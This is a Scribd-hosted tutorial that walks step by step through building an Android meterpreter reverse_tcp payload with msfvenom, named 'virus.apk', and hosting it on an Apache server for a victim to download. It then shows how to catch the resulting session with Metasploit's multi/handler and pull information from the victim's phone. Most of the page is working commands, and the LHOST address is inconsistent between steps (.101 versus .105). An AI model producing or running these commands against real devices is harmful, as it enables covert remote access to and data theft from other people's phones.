Scribd
Upload
20 views

Metasploit Framework Working

This document discusses creating an Android payload using msfvenom, hosting it on an Apache server, and exploiting it with Metasploit's multi/handler exploit. Key steps include: 1. Generating an Android meterpreter reverse_tcp payload with msfvenom specifying LHOST and LPORT. 2. Copying the payload to the Apache server's document root to host it. 3. Configuring the multi/handler exploit in Metasploit to use the payload, set LHOST/LPORT, and run it to establish a session. 4. Using meterpreter commands to extract information from the victim machine.

Uploaded by

RHYTHM OF LIFE
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
20 views

Metasploit Framework Working

This document discusses creating an Android payload using msfvenom, hosting it on an Apache server, and exploiting it with Metasploit's multi/handler exploit. Key steps include: 1. Generating an Android meterpreter reverse_tcp payload with msfvenom specifying LHOST and LPORT. 2. Copying the payload to the Apache server's document root to host it. 3. Configuring the multi/handler exploit in Metasploit to use the payload, set LHOST/LPORT, and run it to establish a session. 4. Using meterpreter commands to extract information from the victim machine.

Uploaded by

RHYTHM OF LIFE
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

$msfconsole

//Metasploit Framework starts

$msfconsole -q

//To start metaspoilt in quite mode without any banner

msf6> show payloads

// selecting android payload no.6 and creating our own payload

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=2233


R>virus.apk
// msfvenom command to create a payload
// then writing -p and giving the android payload name starting from android
// LHOST is the ip of the attacker machine (i.e. ip of your virtual machine)
// LPORT is any 4-digit port number
// R is used to rename the payload file created
// Once the payload is created check the payload size at the end
// Once the payload is created check where the virus.apk is stored using ls command

Now when attacker machine and victim machine are in the same range of network then
we can use the following steps--

We can host our file in the apache server (a hosting service)

To check the hosting service status we use the following command


$service --status-all

// Here if a [-] -ve sign appears before the service then we type
$service apache2 start/stop/restart

Again we check by typing


$service --status-all
and if now [+] appears before the apache2 service then our hosting service is
enabled in our network

Now, we check this by typing our network ip address in the browser and it shows the
apache2 server default page then this means our hosting service is working fine
Now, we need to host this virus.apk in our apache2 server, for that first we need
to go to the location where the default webpage of apache2 server is stored
So, we type the following commands
cd / //to go to the root directory
cd var
cd www
cd html
cd share // create a share folder in html where index.html is stored
Now, come back to the home directory using cd command
After that copy the virus.apk file to /var/www/html/share to host the apk file in
our apache2 server
$sudo cp virus.apk /var/www/html/share
then to check whether virus.apk is hosted or not
$ls /var/www/html/share

After downloading the virus.apk file in your mobile using ipaddress/share path, now
its time to exploit
msf6> use exploit/multi/handler // we will exploit using multihandler exploit
msf6 exploit(multi/handler) > show options // to see what values we have to set for
LHOST and LPORT
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.105
msf6 exploit(multi/handler) > set lport 2233
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > run
// now our meterpreter will run and establish session with the victim machine

meterpreter> ? // to see what commands we can run to extract information from the
victim machine

You might also like